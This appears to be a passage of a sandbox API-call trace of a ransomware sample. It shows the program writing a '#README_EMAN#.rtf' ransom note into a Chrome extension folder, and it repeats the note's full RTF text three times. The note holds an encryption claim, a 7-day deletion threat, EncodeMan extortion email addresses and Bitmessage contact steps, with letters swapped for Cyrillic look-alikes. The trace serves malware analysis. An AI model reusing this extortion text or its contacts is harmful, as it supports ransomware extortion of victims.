(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0289.324] GetLastError () returned 0x2 [0289.324] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 